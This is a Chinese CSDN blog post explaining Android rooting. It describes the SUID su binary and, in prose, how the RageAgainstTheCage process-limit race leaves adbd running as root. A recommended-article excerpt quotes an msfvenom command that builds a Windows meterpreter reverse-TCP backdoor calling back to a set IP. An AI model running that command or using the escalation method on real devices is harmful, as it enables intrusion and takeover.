root方式细节剖析

最新推荐文章于 2021-05-07 14:16:58 发布
最新推荐文章于 2021-05-07 14:16:58 发布
阅读量1k 收藏
点赞数
分类专栏: android安全 文章标签: android root
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tangsilian/article/details/52371416
版权

android系统root的根本原理就是替换su程序。
su程序会设置SUID位,s验证root密码。正确的话su程序可以把用户权限提高root(因为去设置SUID位,运行期是root权限,这样其有权限提升自己的权限)

很早以前的提权方式:
http://blog.claudxiao.net/2011/04/android-adb-setuid/
http://www.oschina.net/question/12_58384?fromerr=FerRWP6j

提权方式一:busybox工具+ratc提权程序(rage aginst the cage)

adbd会检测系统的ro.secure属性,如果该属性为1则将会把自己的用户权限降级成shell用户。一般设备出厂的时候在/default.prop文件中都会设置 ro.secure = 1 这样将会使adbd启动的时候自动降级成shell用户。

1、出厂设置的ro.secure属性为1,则adbd也将运行在shell用户权限下;

2、adb工具创建的进程ratc也运行在shell用户权限下;

3、ratc一直创建子进程(ratc创建的子程序也 将会运行在shell用户权限下),紧接着子程序退出,形成僵尸进程,占用shell用户的进程资源,直到到达shell用户的进程数为 RLIMIT_NPROC的时候(包括adbd、ratc及其子程序),这是ratc将会创建子进程失败。这时候杀掉adbd,adbd进程因为是 Android系统服务,将会被Android系统自动重启,这时候ratc也在竞争产生子程序。在adbd程序执行上面setgid和setuid之 前,ratc已经创建了一个新的子进程,那么shell用户的进程限额已经达到,则adbd进程执行setgid和setuid将会失败。根据代码我们发 现失败之后adbd将会继续执行。这样adbd进程将会运行在root权限下面了。

改系统内核代码:insmod /data/data/xxx/xxx.ko装载内核文件

tangsilian
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于利用方式的Android Root漏洞分析
03-24
基于利用方式将Android root漏洞按照是否可以直接在手机端利用的角度对其分类,评估其威胁程度,并详细描述了现有漏洞提权的实现细节、利用方式以及覆盖的范围,从而为进一步制定漏洞检测方案提供帮助。
android应用获得执行root权限动作__socket_service
10-10
设备系统定制,让应用获得执行root权限动作,利用socket在底层启动一个service(root权限的哦,你懂得)。现在4.4以后root越发困难了,直接集成源码的su命令是不行的。
ADB backupAgent 提权漏洞分析 (CVE-2014-7953)
sos995的专栏
02-27 1748
ADB backupAgent 提权漏洞分析 (CVE-2014-7953) hqdvista · 2015/04/21 14:48 0x00 摘要 CVE-2014-7953是存在于android backup agent中的一个提权漏洞。ActivityManagerService中的bindBackupAgent方法未能校验传入的uid参数,结合另外一个race c
安卓手机免Root运行busybox的命令(重做带图)
wei0987654321的博客
07-19 4784
上次我发不显示篇不显示面不显示照片,所以我又重新发布了一次,让大家看得明白一点。 安卓手机免Root运行busybox的命令 BusyBox 是一个集成了三百多个最常用Linux命令和工具的软件。BusyBox 包含了一些简单的工具,例如ls、cat和echo等等,还包含了一些更大、更复杂的工具,例grep、find、mount以及telnet。有些人将 BusyBox 称为 Linux...
busybox启动默认以root用户登陆运行却没有root权限
lysysjw的专栏
05-27 7154
在以nfs根文件系统启动后发现虽然默认是以root用户登陆的,但是shell默认不是以root权限运行的,表现就是在终端中的command prompt显示的是"$"而不是"#",之前遇到过几次,但是没有深入探讨原因,只是粗暴的把所有文件的owner改成root,这次在buildroot中编译出来的文件系统又存在这个问题了,那么就看看具体原因吧. 在终端中输入"whoami"命令,输出是defa
Android系统system用户权限和root权限的获取
热门推荐
koozxcv的博客
03-10 3万+
在Android系统中,系统为每一个应用程序(apk)创建了一个用户和组。这个用户和组都是受限用户,不能访问系统的数据,只能访问自己的文件和目录,当然它也不能访问其他应用程序的数据。这样设计可以尽可能地保护应用程序的私有数据,增强系统的安全性和健壮性。      但是有一些应用程序是需要访问一些系统资源的。比如Setting程序,它需要访问WiFi,在系统中创建删除文件等等操作。怎样做到这一
root_esprit.rar_ROOT
09-19
root_esprit.rar_ROOT》是一个与信号处理相关的压缩包,主要包含了一个名为...对于理解和应用root_music算法,了解这些细节至关重要,因为它可以帮助我们更好地理解信号处理过程,并在实际问题中调整和优化算法参数。
eisa.rar_ROOT
09-20
通过分析和理解`eisa.c`的内容,我们可以更深入地了解虚拟EISA驱动的工作原理和实现细节。 总的来说,"eisa.rar_ROOT"提供的内容可能涉及到虚拟化技术、EISA总线的历史和特性、驱动程序开发,以及如何在现代计算...
root_music_1.zip_ROOT
最新发布
09-21
通过对这个MATLAB脚本的分析,我们可以深入理解求根MUSIC算法的工作原理和实现细节,从而在实际应用中更好地利用这种高级的空间谱估计技术。在研究或工程实践中,理解并掌握这种改进的算法可以帮助我们提高信号检测...
Wiener.zip_ROOT_影像
07-15
在图像处理中,这个滤波器可以用来减小图像中的噪声,同时尽可能保留图像的细节和边缘信息。 具体来说,Wiener滤波器的滤波器权重是根据输入图像的自相关函数(也称为功率谱)和噪声的功率谱来计算的。这个滤波过程...
android无root权限,使用busybox
mfcSmile的专栏
06-06 2043
没有root权限手机,使用busybox
linux普通用户提权操作
weixin_34380781的博客
03-20 895
[root@test1 ~]# vim /etc/sudoers ## Allow root to run any commands anywhere root ALL=(ALL) ALLzhouyuqiang ALL=(ALL) ALL 添加需要提权的普通用户即可 如操作: sudo ls /root sudo yum wget ...
像极客一样提取Android的Root权限
QY'UniverseSpace的博客
02-05 543
本文将深入揭示提取Android ROOT权限的完整过程。这一过程与网上的方法有很大的差异。很多网上提取ROOT权限的方式都是使用别人做好的程序,有的甚至点击一下按钮就会自动完成所有的工作。这样做尽管可以成功提取ROOT权限,但读者并不能了解其中的原理,而且由于Android设备的千差万别,可能并不是每一种Android设备都可以很容易找到提取ROOT权限的工具。所以最通用的方法就是尽可能利用现成的工具来完成提取ROOT权限的工作。那么现成的工具有什么呢?其实主要就是Android源代码以及Linux内核源
linux安全漏洞,普通用户提权至root执行任意命令!
whoim_i的博客
03-17 3470
目录前言漏洞详情漏洞利用修复建议         ~~~~~~~~        因为想要面对一个新的开始,一个人必须有梦想、有希望、有对未来的憧憬。如果没有这些,就不叫新的开始,而叫逃亡。 ​​​​    ...
Meterpreter提权详解
子曰小玖的博客
08-08 3190
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windo...
linux内核提取ret2usr,CVE-2017-8890 Linux内核提权 ret2usr
weixin_35886660的博客
05-07 141
最近一段时间在研究linux kernel的漏洞利用,我们以CVE-2017-8890为例探索了linux kernel的提权过程.0x00 测试环境linuxkernel版本:4.10.6x86_64调试环境:qemu+linuxkernel+busybox+gdbkernel防护机制:nosmep,nosmap,noKASLR主机:Ubuntu16.04测试...
BusyBox 支持的命令
好习惯成就伟大
08-03 1万+
/ # busybox BusyBox v1.22.1 (2015-05-08 13:56:24 CST) multi-call binary. BusyBox is copyrighted by many authors between 1998-2012. Licensed under GPLv2. See source distribution for detailed copyright...
12、屏幕绘制原理1
08-03
此外,学习官方文档(中文和英文)以及相关博客可以帮助进一步理解和实践这些原理,同时参考文档1、2、3提供了深入的细节和案例分析。 掌握DecorView的工作机制及其与主题、窗口特性和布局之间的关系,是理解和构建...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值